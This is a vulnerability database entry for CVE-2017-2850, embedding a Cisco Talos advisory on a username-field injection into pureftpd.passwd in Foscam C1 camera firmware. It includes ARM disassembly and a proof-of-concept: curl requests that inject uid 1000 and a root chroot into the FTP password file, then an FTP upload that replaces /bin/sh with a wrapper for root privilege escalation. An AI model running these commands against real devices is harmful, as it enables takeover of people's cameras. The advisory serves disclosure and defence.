Vulnerabilities > CVE-2017-2850 - OS Command Injection vulnerability in Foscam C1 Indoor HD Camera Firmware 2.52.2.37
Attack vector
NETWORK Attack complexity
LOW Privileges required
SINGLE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary characters in the pureftpd.passwd file during a username change, which in turn allows for bypassing chroot restrictions in the FTP server. An attacker can simply send an HTTP request to the device to trigger this vulnerability.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 1 | |
| Hardware | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Seebug
| bulletinFamily | exploit |
| description | ### Summary An exploitable injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary characters in the pureftpd.passwd file during a username change, which in turn allows for bypassing chroot restrictions in the FTP server. An attacker can simply send an HTTP request to the device to trigger this vulnerability. ### Tested Versions ``` Foscam, Inc. Indoor IP Camera C1 Series System Firmware Version: 1.9.3.17 Application Firmware Version: 2.52.2.37 Web Version: 2.0.1.1 Plug-In Version: 3.3.0.5 ``` ### Product URLs Foscam ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') ### Details Foscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market. When various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. An example of this registration process is handled inside the `FCGI_Init` function of the "CGIProxy.fcgi" service using the following code: ``` .text:00009F20 FCGX_Init_1f20 .text:00009F20 .text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR} .text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410 .text:00009F28 08 D0 4D E2 SUB SP, SP, #8 .text:00009F2C 05 FC FF EB BL FCGX_Init .text:00009F2C .text:00009F30 00 10 50 E2 SUBS R1, R0, #0 .text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed .text:00009F38 05 00 00 1A BNE leave_exit_1f54 .text:00009F3C .text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74 .text:00009F40 01 20 A0 E1 MOV R2, R1 .text:00009F44 1A FC FF EB BL FCGX_InitRequest .text:00009F48 .text:00009F48 00 00 50 E3 CMP R0, #0 .text:00009F4C 03 00 00 0A BEQ loc_9F60 ... .text:00009F60 loc_9F60 .text:00009F60 DB FE FF EB BL registerMsgClients_1ad4 ; \ \ .text:00009AD4 registerMsgClients_1ad4 .text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR} .text:00009AD4 .text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8 .text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code .text:00009AE0 04 00 A0 E1 MOV R0, R4 .text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function .text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1] .text:00009AE8 .text:00009AEC 04 00 A0 E1 MOV R0, R4 .text:00009AF0 24 10 9F E5 LDR R1, =0x3001 .text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 .text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) .text:00009AF8 .text:00009AFC 04 00 A0 E1 MOV R0, R4 .text:00009B00 18 10 9F E5 LDR R1, =0x3002 .text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 .text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR} .text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ``` After the "CGIProxy.fcgi" service decodes an http request that's forwarded from the http daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request. ``` .text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c .text:00009FAC 08 10 A0 E1 MOV R1, R8 .text:00009FB0 07 00 A0 E1 MOV R0, R7 .text:00009FB4 34 FC FF EB BL strcpy ; [4] .text:00009FB8 .text:00009FB8 08 00 A0 E1 MOV R0, R8 .text:00009FBC C0 FB FF EB BL strlen .text:00009FC0 .text:00009FC0 CC 30 9F E5 LDR R3, =0x404 .text:00009FC4 00 30 8D E5 STR R3, [SP] .text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5] .text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request .text:00009FD0 01 20 A0 E3 MOV R2, #1 .text:00009FD4 04 40 8D E5 STR R4, [SP,#4] .text:00009FD8 08 40 8D E5 STR R4, [SP,#8] .text:00009FDC 0C 40 8D E5 STR R4, [SP,#12] .text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C] .text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8 .text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *) ``` The handler for code 0x4001 is in the "webService" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to `funcptr`. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer. ``` .text:0001E5A4 executeCGICmd .text:0001E5A4 .text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR} .text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28 .text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440 .text:0001E5B0 00 80 A0 E1 MOV R8, R0 .text:0001E5B4 06 10 A0 E1 MOV R1, R6 .text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68 .text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6] .text:0001E5C0 00 70 50 E2 SUBS R7, R0, #0 .text:0001E5C4 27 00 00 0A BEQ replyMsg_1E668 .text:00028EAC sub_28EAC .text:00028EAC .text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR} .text:00028EB0 00 40 51 E2 SUBS R4, R1, #0 .text:00028EB4 00 80 A0 E1 MOV R8, R0 .text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118 .text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF .text:00028EC0 8B 00 00 0A BEQ leaving_290F4 ... .text:00028F4C 00 00 50 E3 CMP R0, #0 .text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88 ... .text:00028F88 findCmdCallback_28F88 .text:00028F88 05 00 A0 E1 MOV R0, R5 .text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24 .text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7] .text:00028F94 00 90 50 E2 SUBS R9, R0, #0 .text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8 ... .text:00028FB8 checkIfAuthNeeded_28FB8 .text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24] .text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF .text:00028FC0 08 10 93 E5 LDR R1, [R3,#8] .text:00028FC4 02 00 51 E1 CMP R1, R2 .text:00028FC8 06 00 00 1A BNE authenticate_28FE8 ... .text:00028FD8 04 00 A0 E1 MOV R0, R4 .text:00028FDC 33 FF 2F E1 BLX R3 ; [8] .text:00028FE0 09 00 A0 E1 MOV R0, R9 .text:00028FE4 42 00 00 EA B leaving_290F4 ... .text:000290E0 04 00 A0 E1 MOV R0, R4 .text:000290E4 33 FF 2F E1 BLX R3 ; [9] .text:000290E8 05 00 A0 E1 MOV R0, R5 .text:000290EC 00 00 00 EA B leaving_290F4 ... .text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118 .text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC} ``` When handling the "CGIProxy.fcgi" command "changeUserName", the function `changeUserName_39544` will be called. This function is responsible for changing the username of an existing user account. At the beginning of the function, the parameters [10] for "usrName", "newUsrName", "usr", and "callbackJson" are extracted from the query. The function then checks that the user (given by the "usr" parameter) either has privilege 2 [11] (i.e. administrator) or that the account that he's changing the username for is his [12]. This last check is useless since this command is only allowed for users with privilege 2. Finally it checks that the "usrName" [13] and "newUsrName" [14] parameters are not null and passes them to the `changeAccountUsername_1d6e8` function [15]. ``` .text:00041544 changeUserName_39544 .text:00041544 .text:00041544 F0 41 2D E9 STMFD SP!, {R4-R8,LR} ... .text:00041570 4A 8E 8D E2 ADD R8, SP, #0x4F8+var_58 ... .text:00041578 C0 11 9F E5 LDR R1, =str.usrName ; [10] .text:0004157C 08 20 A0 E1 MOV R2, R8 .text:00041580 05 00 A0 E1 MOV R0, R5 .text:00041584 2F 9B FF EB BL extract_param .text:00041588 42 6E 8D E2 ADD R6, SP, #0x4F8+var_D8 .text:0004158C B0 11 9F E5 LDR R1, =str.newUsrName ; [10] .text:00041590 46 2E 8D E2 ADD R2, SP, #0x4F8+var_98 .text:00041594 05 00 A0 E1 MOV R0, R5 .text:00041598 2A 9B FF EB BL extract_param .text:0004159C 4E 4E 8D E2 ADD R4, SP, #0x4F8+var_18 .text:000415A0 A0 11 9F E5 LDR R1, =str.usr ; [10] .text:000415A4 06 20 A0 E1 MOV R2, R6 .text:000415A8 05 00 A0 E1 MOV R0, R5 .text:000415AC 00 70 A0 E3 MOV R7, #0 .text:000415B0 24 9B FF EB BL extract_param .text:000415B4 CC 74 64 E5 STRB R7, [R4,#-0x4CC]! .text:000415B8 8C 11 9F E5 LDR R1, =str.callbackJson ; [10] .text:000415BC 04 20 A0 E1 MOV R2, R4 .text:000415C0 05 00 A0 E1 MOV R0, R5 .text:000415C4 1F 9B FF EB BL extract_param .text:000415C8 80 01 9F E5 LDR R0, =off_C5268 .text:000415CC 06 10 A0 E1 MOV R1, R6 .text:000415D0 4F 8C FF EB BL getUserPrivilege_1c714 .text:000415D4 02 00 50 E3 CMP R0, #2 ; [11] .text:000415D8 08 00 00 0A BEQ loc_41600 .text:000415DC 06 00 A0 E1 MOV R0, R6 .text:000415E0 08 10 A0 E1 MOV R1, R8 .text:000415E4 14 47 FF EB BL strcmp ; [12] .text:000415E8 07 00 50 E1 CMP R0, R7 .text:000415EC 60 01 9F 15 LDRNE R0, =dword_D5A68 .text:000415F0 04 10 A0 11 MOVNE R1, R4 .text:000415F4 03 20 E0 13 MOVNE R2, #0xFFFFFFFC .text:000415F8 07 30 A0 11 MOVNE R3, R7 .text:000415FC 3C 00 00 1A BNE loc_416F4 .text:00041600 .text:00041600 loc_41600 .text:00041600 A0 34 DD E5 LDRB R3, [SP,#0x4F8+var_58] ; [13] .text:00041604 00 00 53 E3 CMP R3, #0 .text:00041608 02 00 00 0A BEQ loc_41618 .text:0004160C 60 34 DD E5 LDRB R3, [SP,#0x4F8+var_98] ; [14] .text:00041610 00 00 53 E3 CMP R3, #0 .text:00041614 03 00 00 1A BNE loc_41628 ... .text:00041628 loc_41628 .text:00041628 4A 6E 8D E2 ADD R6, SP, #0x4F8+var_58 ; [13] .text:0004162C 46 7E 8D E2 ADD R7, SP, #0x4F8+var_98 ; [14] .text:00041630 06 10 A0 E1 MOV R1, R6 .text:00041634 07 20 A0 E1 MOV R2, R7 .text:00041638 10 01 9F E5 LDR R0, =off_C5268 .text:0004163C 29 90 FF EB BL changeAccountUsername_1d6e8 ; [15] ``` `changeAccountUsername_1d6e8` first checks that "newUsrName" doesn't already exists [16] and that "usrName" exists [17], using a loop over the user-account object that was passed via `r0`. Then the new username is saved in the file "/mnt/mtd/app/config/UserAccountConfig.bin" [18]. ``` .text:000256E8 changeAccountUsername_1d6e8 .text:000256E8 .text:000256E8 F0 47 2D E9 STMFD SP!, {R4-R10,LR} ... .text:0002571C .text:0002571C loc_2571C ; [16] .text:0002571C 10 30 97 E5 LDR R3, [R7,#0x10] .text:00025720 00 00 53 E3 CMP R3, #0 .text:00025724 F3 00 00 0A BEQ loc_25AF8 .text:00025728 14 00 97 E5 LDR R0, [R7,#0x14] .text:0002572C 04 10 A0 E1 MOV R1, R4 .text:00025730 C1 B6 FF EB BL strcmp .text:00025734 00 00 50 E3 CMP R0, #0 .text:00025738 EE 00 00 1A BNE loc_25AF8 ... .text:00025AF8 loc_25AF8 .text:00025AF8 01 A0 8A E2 ADD R10, R10, #1 .text:00025AFC 09 00 5A E3 CMP R10, #9 .text:00025B00 10 70 87 E2 ADD R7, R7, #0x10 .text:00025B04 04 FF FF 1A BNE loc_2571C ... .text:00025774 loc_25774 ; [17] .text:00025774 10 30 96 E5 LDR R3, [R6,#0x10] .text:00025778 00 00 53 E3 CMP R3, #0 .text:0002577C 05 00 00 0A BEQ loc_25798 .text:00025780 14 00 96 E5 LDR R0, [R6,#0x14] .text:00025784 08 10 A0 E1 MOV R1, R8 .text:00025788 AB B6 FF EB BL strcmp .text:0002578C 00 00 50 E3 CMP R0, #0 .text:00025790 0A 90 A0 01 MOVEQ R9, R10 .text:00025794 01 70 A0 03 MOVEQ R7, #1 .text:00025798 .text:00025798 loc_25798 .text:00025798 01 A0 8A E2 ADD R10, R10, #1 .text:0002579C 09 00 5A E3 CMP R10, #9 .text:000257A0 10 60 86 E2 ADD R6, R6, #0x10 .text:000257A4 F2 FF FF 1A BNE loc_25774 .text:000257A8 00 00 57 E3 CMP R7, #0 .text:000257AC 0A 00 00 1A BNE loc_257DC ... .text:000257DC .text:000257DC loc_257DC .text:000257DC 09 02 85 E0 ADD R0, R5, R9,LSL#4 .text:000257E0 04 10 A0 E1 MOV R1, R4 .text:000257E4 14 00 80 E2 ADD R0, R0, #0x14 .text:000257E8 88 B5 FF EB BL std::string::operator=(char const*) .text:000257EC 10 00 85 E2 ADD R0, R5, #0x10 .text:000257F0 44 F4 FF EB BL sub_22908 ; [18] .text:000257F4 05 00 A0 E1 MOV R0, R5 .text:000257F8 04 10 A0 E1 MOV R1, R4 .text:000257FC C4 FB FF EB BL getUserPrivilege_1c714 .text:00025800 88 35 D5 E5 LDRB R3, [R5,#0x588] .text:00025804 00 00 53 E3 CMP R3, #0 .text:00025808 B6 00 00 0A BEQ loc_25AE8 ``` The last operation needed to successfully update the username is an update of the FTP database. To do this, the function first ensures that the user's privilege is 2, then it opens the "pureftpd.passwd" [20] and reads its whole content in a local variable [21]. Then the username line of interest is searched with `strstr` [22] using "\n%s", where "%s" is the old username that has to be changed. The pointer to the old username is saved in `r5` [23], and the "passwd" contents are split before `r5` [24] by copying the preceding contents in a buffer [25]. The function then searches for ":" [26] (i.e. the pointer to the rest of the file after the old user name). The new "passwd" file is then rebuilt using `snprintf` [27] and concatenating the buffer [25], the new username and the contents after the old username [26]. Finally the "pure-pw mkdb" [28] command is ran to apply the database modifications without restarting the FTP daemon. Up until this point no checks are performed on the contents of the "newUsrName" parameter, which allows for arbitrarily injecting any characters in the "pureftpd.passwd" file. ``` .text:0002580C 02 00 50 E3 CMP R0, #2 ; [19] .text:00025810 B4 00 00 1A BNE loc_25AE8 .text:00025814 04 33 9F E5 LDR R3, =off_D5F10 .text:00025818 04 13 9F E5 LDR R1, =str.rw ; "rw" .text:0002581C 00 00 93 E5 LDR R0, [R3] ; "/usr/local/pureftpd/etc/pureftpd.passwd" .text:00025820 C9 B4 FF EB BL fopen ; [20] .text:00025824 27 7C 8D E2 ADD R7, SP, #0x4E78+var_2778 .text:00025828 18 70 87 E2 ADD R7, R7, #0x18 ... .text:00025834 00 A0 A0 E1 MOV R10, R0 ... .text:00025850 07 00 A0 E1 MOV R0, R7 .text:00025854 01 10 A0 E3 MOV R1, #1 .text:00025858 C8 22 9F E5 LDR R2, =0x2710 .text:0002585C 0A 30 A0 E1 MOV R3, R10 .text:00025860 A4 B4 FF EB BL fread ; [21] ... .text:000258A0 loc_258A0 .text:000258A0 4E 6C 8D E2 ADD R6, SP, #0x4E78+var_78 .text:000258A4 28 60 86 E2 ADD R6, R6, #0x28 .text:000258A8 06 00 A0 E1 MOV R0, R6 .text:000258AC 14 10 A0 E3 MOV R1, #0x14 .text:000258B0 7C 22 9F E5 LDR R2, =str.s_ ; "\n%s:" .text:000258B4 08 30 A0 E1 MOV R3, R8 ; parameter "usrName" .text:000258B8 0A B4 FF EB BL snprintf .text:000258BC 06 10 A0 E1 MOV R1, R6 .text:000258C0 07 00 A0 E1 MOV R0, R7 .text:000258C4 5C DC FF EB BL j_strstr ; [22] .text:000258C8 00 50 50 E2 SUBS R5, R0, #0 ; [23] .text:000258CC 00 60 A0 13 MOVNE R6, #0 .text:000258D0 0D 00 00 1A BNE loc_2590C ... .text:00025928 4E 0C 8D E2 ADD R0, SP, #0x4E78+var_78 .text:0002592C 4E 2C 8D E2 ADD R2, SP, #0x4E78+var_78 .text:00025930 48 00 80 E2 ADD R0, R0, #0x48 .text:00025934 54 20 82 E2 ADD R2, R2, #0x54 .text:00025938 C3 B3 FF EB BL std::string::string() .text:0002593C 27 2C 8D E2 ADD R2, SP, #0x4E78+var_2778 .text:00025940 18 20 82 E2 ADD R2, R2, #0x18 .text:00025944 01 20 62 E2 RSB R2, R2, #1 .text:00025948 4E 0C 8D E2 ADD R0, SP, #0x4E78+var_78 .text:0002594C 4E 1C 8D E2 ADD R1, SP, #0x4E78+var_78 .text:00025950 44 00 80 E2 ADD R0, R0, #0x44 .text:00025954 48 10 81 E2 ADD R1, R1, #0x48 .text:00025958 05 20 82 E0 ADD R2, R2, R5 ; [23] .text:0002595C 54 FF FF EB BL sub_256B4 ; [24] .text:00025960 4E 6C 8D E2 ADD R6, SP, #0x4E78+var_78 .text:00025964 44 60 86 E2 ADD R6, R6, #0x44 .text:00025968 4E 0C 8D E2 ADD R0, SP, #0x4E78+var_78 .text:0002596C 4C 00 80 E2 ADD R0, R0, #0x4C .text:00025970 06 10 A0 E1 MOV R1, R6 .text:00025974 0C B3 FF EB BL std::string::operator=() ; [25] ... .text:00025A54 3A 10 A0 E3 MOV R1, #0x3A ; ':' .text:00025A58 05 00 A0 E1 MOV R0, R5 .text:00025A5C 41 B6 FF EB BL strchr ; [26] .text:00025A60 01 C9 8D E2 ADD R12, SP, #0x4E78+var_E78 .text:00025A64 00 40 8D E5 STR R4, [SP,#0x4E78+var_4E78] .text:00025A68 B8 10 9F E5 LDR R1, =0x2710 .text:00025A6C C8 20 9F E5 LDR R2, =str.sss ; "%s:%s:%s" .text:00025A70 04 00 8D E5 STR R0, [SP,#0x4E78+var_4E74] .text:00025A74 08 00 8D E2 ADD R0, SP, #0x4E78+s .text:00025A78 4C 3E 9C E5 LDR R3, [R12,#0xE4C] .text:00025A7C 99 B3 FF EB BL snprintf ; [27] .text:00025A80 0A 00 A0 E1 MOV R0, R10 .text:00025A84 0C B4 FF EB BL fclose .text:00025A88 90 30 9F E5 LDR R3, =off_D5F10 .text:00025A8C AC 10 9F E5 LDR R1, =str.w ; "w+" .text:00025A90 00 00 93 E5 LDR R0, [R3] ; "/usr/local/pureftpd/etc/pureftpd.passwd" .text:00025A94 2C B4 FF EB BL fopen .text:00025A98 00 40 A0 E1 MOV R4, R0 .text:00025A9C 04 10 A0 E1 MOV R1, R4 .text:00025AA0 08 00 8D E2 ADD R0, SP, #0x4E78+s .text:00025AA4 E8 B4 FF EB BL fputs .text:00025AA8 04 00 A0 E1 MOV R0, R4 .text:00025AAC 02 B4 FF EB BL fclose .text:00025AB0 8C 00 9F E5 LDR R0, =str.purepwmkdb ; [28] .text:00025AB4 A4 B2 FF EB BL system ``` By injecting the character ":" it's possible to add new fields to a line in the "passwd" file. This allows for modifying the uid, gid and directory used for chroot. Nevertheless, when using the "puredb" authentication method, "pure-ftpd" doesn't allow to log-in using uid 0, so the uid with highest privilege that can be used in this injection is 1000. By default the uid set for ftp users is 1001, which only has permission to write inside "/mnt/sd". Whereas users with uid 1000 have permission to write almost anywhere in the filesystem. This can be leveraged by an attacker to escalate privileges to root. ### Exploit Proof-of-Concept This vulnerability is reachable by the "changeUserName" command and requires a valid user account with privilege level 2. For clarity, the following proof-of-concept adds a new account with privilege level 2 before exploiting the vulnerability. ``` $ sUsr="admin" $ sPwd="" $ sFtpUsr="usr" $ sFtpPwd="pwd" $ sCryptPass=$(openssl passwd -crypt "${sFtpPwd}") $ sInj=":${sCryptPass}:1000:1000::/::::::::::::" $ curl "http://$SERVERIP:$SERVERPORT/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=addAccount&usrName=${sFtpUsr}&usrPwd=${sFtpPwd}&privilege=2" $ curl "http://$SERVERIP:$SERVERPORT/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=changeUserName&usrName=${sFtpUsr}&newUsrName=${sFtpUsr}${sInj}" ``` By exploiting the fact that in this device many processes running as "root" use the `system` function, it's possible to escalate privileges by overwriting "/bin/sh" with a simple wrapper: ``` $ cat <<\EOF > sh #!/bin/busybox sh id > /tmp/www/injected.txt exec /bin/busybox sh "$@" EOF $ echo -en "delete /bin/sh\nput sh /bin/sh\nchmod 777 /bin/sh\n" | ftp "ftp://${sFtpUsr}:${sFtpPwd}@${SERVERIP}:50021" ``` ### Timeline * 2017-05-30 - Vendor Disclosure * 2017-06-19 - Public Release ### CREDIT * Discovered by Claudio Bozzato of Cisco Talos. |
| id | SSV:96485 |
| last seen | 2017-11-19 |
| modified | 2017-09-15 |
| published | 2017-09-15 |
| reporter | Root |
| title | Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability(CVE-2017-2850) |
Talos
| id | TALOS-2017-0352 |
| last seen | 2019-05-29 |
| published | 2017-06-19 |
| reporter | Talos Intelligence |
| source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0352 |
| title | Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability |